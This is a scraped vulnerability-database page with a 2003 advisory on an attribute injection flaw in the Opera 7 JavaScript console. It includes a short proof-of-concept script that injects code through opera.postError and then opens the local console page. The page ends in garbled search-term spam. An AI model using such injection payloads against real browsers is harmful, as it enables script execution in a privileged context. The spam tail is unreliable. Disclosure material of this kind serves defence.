exploits , vulnerabilities , articles , Opera JavaScript Console Single Quote Attribute Injection Vulnerability

Title	Opera JavaScript Console Single Quote Attribute Injection Vulnerability
Published	2003-04-28-12:00AM
Updated	2003-04-28-04:49PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of this issue is credited to nesumin <nesumin@softhome.net>.
Vulnerable	Opera Software Opera Web Browser 7.10 Opera Software Opera Web Browser 7.0 3win32 Opera Software Opera Web Browser 7.0 2win32 Opera Software Opera Web Browser 7.0 1win32
Not Vulnerable
Code	The following proof-of-concept examples were provided: var message = "http://');alert(location.href+'"; opera.postError( message ); location.href = "file://localhost/console.html"; var message = "http://');alert(location.href+'"; opera.postError( message ); Additional exploit examples can be found in the attached Bugtraq reference. location.href = "file://localhost/console.html";
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities
2009-12-17 Quick Heal AntiVirus Insecure Program File Permissions Local Privilege Escalation Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 14:13:40 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
punbb xp admin www.mqdm.n lady www.newmoo news%252Bf /search/ex dani woodw kernel 2.6 Invision P WETPUSSY.C Common remotre fi 17655.html SHAKILASEX /search/ex Www.Sexs h news for c tongs /search/ex error.php? Microsoft mambo Remo Www.Sexs h www.jqspl. Www.Sexs h maxcpm.inf xsxx Linux 2.4 components components Apache Mod sexgirlsvi Free dounl ssh passwo www.sxs.fr www.zhmf51 news for c vidao sex www.sxs.fr Sma goront familyseks Www.sex.co www pink w www.wd42.c www.sexsex 2004 explo news for c /\\\\ tun than a